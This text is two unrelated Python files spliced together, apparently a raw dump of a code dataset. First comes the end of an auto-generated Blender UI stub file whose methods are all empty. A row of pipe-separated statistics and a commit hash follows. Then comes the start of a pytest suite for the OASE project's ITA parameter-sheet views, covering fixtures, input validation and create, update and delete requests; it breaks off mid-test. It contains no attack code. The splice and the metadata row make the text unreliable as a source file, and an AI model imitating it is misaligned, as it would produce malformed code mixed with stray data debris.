'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_constraints(ObjectConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
| 12.955194 | 79 | 0.397745 | 27,179 | 334,244 | 4.635932 | 0.005261 | 0.217778 | 0.243571 | 0.291857 | 0.99 | 0.99 | 0.99 | 0.99 | 0.99 | 0.988952 | 0 | 0 | 0.473615 | 334,244 | 25,799 | 80 | 12.955696 | 0.716149 | 0 | 0 | 0.990811 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.458879 | false | 0.458879 | 0.000345 | 0 | 0.527452 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 13 |
9a9d9683d3717ae07aa8b5adb615464d2616cb96 | 36,953 | py | Python | oase-root/tests/web_app/views/system/test_ITA_paramsheet.py | fukuda-takashi/oase | 9db7f557754b543aeea62402401b8be84ceca948 | [
"Apache-2.0"
] | null | null | null | oase-root/tests/web_app/views/system/test_ITA_paramsheet.py | fukuda-takashi/oase | 9db7f557754b543aeea62402401b8be84ceca948 | [
"Apache-2.0"
] | null | null | null | oase-root/tests/web_app/views/system/test_ITA_paramsheet.py | fukuda-takashi/oase | 9db7f557754b543aeea62402401b8be84ceca948 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
[概要]
メッセージ解析 tests
"""
import pytest
import unittest
import datetime
import pytz
import json
from importlib import import_module
from mock import Mock
from django.urls import reverse
from django.http import Http404
from django.test import Client, RequestFactory
from libs.commonlibs.common import Common
from libs.commonlibs import define as defs
from web_app.models.models import ActionType, DriverType, User, PasswordHistory
from web_app.views.system.ITA_paramsheet import _get_param_match_info, _make_disp_name, _validate, modify as paramsheet_modify
from web_app.views.system.ITA_paramsheet import _get_param_item_info
def get_adminstrator():
"""
サイトにログインしwebページをクロールできるシステム管理者を返す
ユーザデータの加工、セッションの保存の後ログインをしている。
"""
password = 'OaseTest@1'
admin = User.objects.get(pk=1)
admin.password = Common.oase_hash(password)
admin.last_login = datetime.datetime.now(pytz.timezone('UTC'))
admin.password_last_modified = datetime.datetime.now(pytz.timezone('UTC'))
admin.save(force_update=True)
PasswordHistory.objects.create(
user_id=1,
password=Common.oase_hash(password),
last_update_timestamp=datetime.datetime.now(pytz.timezone('UTC')),
last_update_user=admin.user_name
)
client = Client()
session = client.session
session['cookie_age'] = (
datetime.datetime.now(pytz.timezone('UTC')) +
datetime.timedelta(minutes=30)
).strftime('%Y-%m-%d %H:%M:%S')
session.save()
_ = client.login(username='administrator', password=password)
return client
@pytest.fixture(scope='function')
def ITAparamsheet_actiontype_data():
"""
アクション種別設定データ作成(正常系テスト用)
"""
ActionType(
action_type_id = 999,
driver_type_id = 1,
disuse_flag = '0',
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ActionType.objects.filter(action_type_id=999).delete()
@pytest.fixture(scope='function')
def ITAparamsheet_itadriver_data():
"""
アクション設定データ作成(正常系テスト用)
"""
module = import_module('web_app.models.ITA_models')
ItaDriver = getattr(module, 'ItaDriver')
ItaDriver(
ita_driver_id = 999,
ita_disp_name = 'ITA_1-3-0_pytest',
hostname = 'host_pytest',
username = 'pytest',
password = 'pytest',
protocol = 'https',
port = 443,
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ItaDriver.objects.filter(ita_driver_id=999).delete()
@pytest.fixture(scope='function')
def ITAparamsheet_itaparammatchinfo_data():
"""
ITAパラメータ抽出条件データ作成(正常系テスト用)
"""
module = import_module('web_app.models.ITA_models')
ItaParameterMatchInfo = getattr(module, 'ItaParameterMatchInfo')
ItaParameterMatchInfo(
match_id = 999,
ita_driver_id = 999,
menu_id = 999,
parameter_name = 'パラメーター名',
order = 0,
conditional_name = '条件名',
extraction_method1 = '',
extraction_method2 = '',
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ItaParameterMatchInfo.objects.filter(match_id=999).delete()
@pytest.fixture(scope='function')
def ITAparamsheet_itamenuname_data():
"""
ITAパラメータ抽出条件データ作成(正常系テスト用)
"""
module = import_module('web_app.models.ITA_models')
ItaMenuName = getattr(module, 'ItaMenuName')
ItaMenuName(
ita_menu_name_id = 999,
ita_driver_id = 999,
menu_group_id = 999,
menu_id = 999,
menu_group_name = 'group',
menu_name = 'menu',
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ItaMenuName.objects.filter(ita_menu_name_id=999).delete()
@pytest.fixture(scope='function')
def ITAparamsheet_itaparammatchinfo_data_forupdate():
"""
ITAパラメータ抽出条件データ作成(正常系テスト用)
"""
module = import_module('web_app.models.ITA_models')
ItaParameterMatchInfo = getattr(module, 'ItaParameterMatchInfo')
ItaParameterMatchInfo(
match_id = 1,
ita_driver_id = 1,
menu_id = 999,
parameter_name = 'パラメーター名',
order = 0,
conditional_name = '条件名',
extraction_method1 = '',
extraction_method2 = '',
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
ItaParameterMatchInfo(
match_id = 2,
ita_driver_id = 2,
menu_id = 999,
parameter_name = 'パラメーター名',
order = 0,
conditional_name = '条件名',
extraction_method1 = '',
extraction_method2 = '',
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ItaParameterMatchInfo.objects.filter(menu_id = 999).delete()
@pytest.fixture(scope='function')
def ITAparamsheet_paraminfo_data():
"""
ITAパラメーター項目情報データ作成(正常系テスト用)
"""
module = import_module('web_app.models.ITA_models')
ItaParameterItemInfo = getattr(module, 'ItaParameterItemInfo')
ItaParameterItemInfo(
ita_driver_id = 999,
menu_id = 999,
column_group = 'pytest_col_grp',
item_name = 'pytest項目名',
item_number = 99,
ita_order = 1,
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ItaParameterItemInfo.objects.filter(ita_driver_id=1, item_number=99).delete()
@pytest.mark.django_db
class TestITAParamSheet(object):
"""
web_app/views/system/ITA_paramsheet.pyのテストクラス
(render後のtemplate実装内容含めた画面出力結果の確認)
"""
###########################################
# 共通部分テスト
###########################################
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data',
'ITAparamsheet_itamenuname_data'
)
def test_get_param_match_info_ok(self):
"""
ITAパラメータ抽出条件情報を取得
※ 正常系
"""
data_list, drv_info, menu_info, item_info = _get_param_match_info(
1,
[defs.VIEW_ONLY, defs.ALLOWED_MENTENANCE],
[1]
)
assert len(data_list) > 0
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data',
'ITAparamsheet_itamenuname_data'
)
def test_get_param_match_info_ng_ver(self):
"""
ITAパラメータ抽出条件情報を取得
※ 異常系(バージョン不一致)
"""
sts_code = 200
try:
data_list, drv_info, menu_info, item_info = _get_param_match_info(
0,
[defs.VIEW_ONLY, defs.ALLOWED_MENTENANCE],
[1]
)
except Http404:
sts_code = 404
assert sts_code == 404
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data',
'ITAparamsheet_itamenuname_data'
)
def test_make_disp_name_ok(self):
"""
文字列結合処理
※ 正常系
"""
module = import_module('web_app.models.ITA_models')
ItaMenuName = getattr(module, 'ItaMenuName')
Itaname_dict = ItaMenuName.objects.values('ita_driver_id', 'menu_group_id', 'menu_id', 'menu_group_name', 'menu_name')
ita_driver_id = 999
menu_id = 999
disp_name = _make_disp_name(Itaname_dict, ita_driver_id, menu_id)
assert len(disp_name) > 0
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data',
'ITAparamsheet_itamenuname_data'
)
def test_make_disp_name_ng(self):
"""
文字列結合処理
※ データが一致しない場合
"""
module = import_module('web_app.models.ITA_models')
ItaMenuName = getattr(module, 'ItaMenuName')
Itaname_dict = ItaMenuName.objects.values('ita_driver_id', 'menu_group_id', 'menu_id', 'menu_group_name', 'menu_name')
ita_driver_id = 1
menu_id = 1
disp_name = _make_disp_name(Itaname_dict, ita_driver_id, menu_id)
assert disp_name == None
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ok(self):
"""
バリデーション
※ 正常系
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert error_flag == False
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_matchid(self):
"""
バリデーション
※ 異常系(更新対象match_idなし)
"""
json_str = (
'{"json_str": ['
'{"ope": "2",'
' "match_id": "998",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27312' in error_msg['1']['ita_driver_id']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_driverid(self):
"""
バリデーション
※ 異常系(指定driver_idなし)
"""
json_str = (
'{"json_str": ['
'{"ope": "2",'
' "match_id": "999",'
' "ita_driver_id": "0",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27313' in error_msg['1']['ita_driver_id']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_duplicate(self):
"""
バリデーション
※ 異常系(一意制約違反)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"},'
'{"ope": "1",'
' "match_id": "998",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "2"}'
']}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27314' in error_msg['2']['ita_driver_id']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_menuid_empty(self):
"""
バリデーション
※ 異常系(menu_id)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27317' in error_msg['1']['menu_id']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_parametername_empty(self):
"""
バリデーション
※ 異常系(parameter_name)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27318' in error_msg['1']['parameter_name']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_parametername_length(self):
"""
バリデーション
※ 異常系(parameter_name文字列上限を超過)
"""
param_name = (
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
)
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "%s",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
) % (param_name)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27319' in error_msg['1']['parameter_name']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_order_empty(self):
"""
バリデーション
※ 異常系(order)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27320' in error_msg['1']['order']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_conditionalname_empty(self):
"""
バリデーション
※ 異常系(conditional_name)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27321' in error_msg['1']['conditional_name']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_conditionalname_length(self):
"""
バリデーション
※ 異常系(conditional_name文字列上限を超過)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "1234567890123456789012345678901234567890",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27322' in error_msg['1']['conditional_name']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_method1_length(self):
"""
バリデーション
※ 異常系(extraction_method1文字列上限を超過)
"""
method_val = (
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
)
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "%s",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
) % (method_val)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27323' in error_msg['1']['extraction_method1']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_method2_length(self):
"""
バリデーション
※ 異常系(extraction_method2文字列上限を超過)
"""
method_val = (
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
)
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "%s",'
' "row_id": "1"}]}'
) % (method_val)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27324' in error_msg['1']['extraction_method2']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_paraminfo_data'
)
def test_get_param_item_info_ok(self):
"""
パラメーター項目情報を取得
※正常系
"""
filter_info = {
'ita_driver_id' : 999,
'menu_id' : 999,
}
item_info = _get_param_item_info('ItaParameterItemInfo', filter_info)
assert len(item_info[999][999]) >= 2
###########################################
# 参照画面テスト
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_actiontype_data')
def test_index_ok(self, admin):
"""
参照画面表示
※ 正常系
"""
response = admin.get(reverse('web_app:system:paramsheet', args=[1,]))
content = response.content.decode('utf-8')
assert response.status_code == 200
@pytest.mark.usefixtures('ita_table')
def test_index_ng(self, admin):
"""
参照画面表示
※ 異常系
"""
response = admin.get(reverse('web_app:system:paramsheet', args=[0,]))
content = response.content.decode('utf-8')
assert response.status_code == 404
###########################################
# 編集画面テスト
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_actiontype_data')
def test_edit_ok(self, admin):
"""
編集画面表示
※ 正常系
"""
response = admin.post(reverse('web_app:system:paramsheet_edit', args=[1,]))
content = response.content.decode('utf-8')
assert response.status_code == 200
@pytest.mark.usefixtures('ita_table')
def test_edit_ng(self, admin):
"""
編集画面表示
※ 異常系
"""
response = admin.post(reverse('web_app:system:paramsheet_edit', args=[0,]))
content = response.content.decode('utf-8')
assert response.status_code == 404
###########################################
# 登録機能テスト
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data')
def test_modify_insert_ok(self, admin, monkeypatch):
"""
抽出条件テーブル登録処理
※ 正常系
"""
admin = get_adminstrator()
# 登録処理
json_str = {
'json_str': [
{
'ope': '1',
'match_id': '2',
'ita_driver_id': '1',
'menu_id': '1',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '1',
'match_id': '3',
'ita_driver_id': '1',
'menu_id': '1',
'parameter_name': 'プロセス',
'order': '1',
'conditional_name': 'メッセージ本文',
'extraction_method1': 'pid=\\d*',
'extraction_method2': 'pid=',
'row_id': '3'
}
]
}
json_data = json.dumps(json_str)
module = getattr(import_module('web_app.views.system'), 'ITA_paramsheet')
monkeypatch.setattr(module, '_validate', lambda x, y, z: (False, {}))
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[1,]), {'json_str':json_data})
assert response.status_code == 200
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data')
def test_modify_insert_ng(self, admin, monkeypatch):
"""
抽出条件テーブル登録処理
※ 異常系
"""
admin = get_adminstrator()
with pytest.raises(Exception):
response = admin.post(path=reverse('web_app:system:paramsheet_modify', args=[0,]), content_type='application/json')
assert False
json_str = {
'json_str': [
{
'ope': '1',
'match_id': '2',
'ita_driver_id': '1',
'menu_id': '1',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '1',
'match_id': '3',
'ita_driver_id': '1',
'menu_id': '1',
'parameter_name': 'プロセス',
'order': '1',
'conditional_name': 'メッセージ本文',
'extraction_method1': 'pid=\\d*',
'extraction_method2': 'pid=',
'row_id': '3'
}
]
}
json_data = json.dumps(json_str)
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[999,]), {'json_str':json_data})
assert response.status_code == 404
module = getattr(import_module('web_app.views.system'), 'ITA_paramsheet')
monkeypatch.setattr(module, '_validate', lambda x, y, z: (True, {'xxx'}))
with pytest.raises(Exception):
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[1,]), {'json_str':json_data})
assert False
###########################################
# 削除機能テスト
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data')
def test_modify_delete_ok(self, admin, monkeypatch):
"""
抽出条件テーブル削除処理
※ 正常系
"""
admin = get_adminstrator()
# 削除処理
json_str = {
'json_str': [
{
'ope': '3',
'match_id': '999',
'ita_driver_id': '999',
'menu_id': '999',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
}
]
}
json_data = json.dumps(json_str)
module = getattr(import_module('web_app.views.system'), 'ITA_paramsheet')
monkeypatch.setattr(module, '_validate', lambda x, y, z: (False, {}))
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[1,]), {'json_str':json_data})
assert response.status_code == 200
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data')
def test_modify_delete_ng(self, admin):
"""
抽出条件テーブル削除処理
※ 異常系
"""
admin = get_adminstrator()
# 削除処理
json_str = {
'json_str': [
{
'ope': '3',
'match_id': '999',
'ita_driver_id': '999',
'menu_id': '999',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
}
]
}
json_data = json.dumps(json_str)
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[999,]), {'json_str':json_data})
assert response.status_code == 404
###########################################
# 更新機能テスト
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data_forupdate')
def test_modify_update_ok(self, admin, monkeypatch):
"""
抽出条件テーブル更新処理
※ 正常系
"""
admin = get_adminstrator()
# 更新処理
json_str = {
'json_str': [
{
'ope': '2',
'match_id': '1',
'ita_driver_id': '1',
'menu_id': '999',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '2',
'match_id': '2',
'ita_driver_id': '2',
'menu_id': '999',
'parameter_name': 'プロセス',
'order': '1',
'conditional_name': 'メッセージ本文',
'extraction_method1': 'pid=\\d*',
'extraction_method2': 'pid=',
'row_id': '3'
}
]
}
json_data = json.dumps(json_str)
module = getattr(import_module('web_app.views.system'), 'ITA_paramsheet')
monkeypatch.setattr(module, '_validate', lambda x, y, z: (False, {}))
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[1,]), {'json_str':json_data})
assert response.status_code == 200
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data_forupdate')
def test_modify_update_ng(self, admin):
"""
抽出条件テーブル更新処理
※ 異常系
"""
admin = get_adminstrator()
# 更新処理
json_str = {
'json_str': [
{
'ope': '2',
'match_id': '1',
'ita_driver_id': '1',
'menu_id': '999',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '2',
'match_id': '2',
'ita_driver_id': '2',
'menu_id': '999',
'parameter_name': 'プロセス',
'order': '1',
'conditional_name': 'メッセージ本文',
'extraction_method1': 'pid=\\d*',
'extraction_method2': 'pid=',
'row_id': '3'
}
]
}
json_data = json.dumps(json_str)
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[999,]), {'json_str':json_data})
assert response.status_code == 404
###########################################
# 登録・更新・削除機能 複合テスト
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data')
def test_modify_crud_ok(self, admin, monkeypatch):
"""
抽出条件テーブル登録・変更・削除処理
※ 正常系
"""
admin = get_adminstrator()
# 登録処理
json_str = {
'json_str': [
{
'ope': '1',
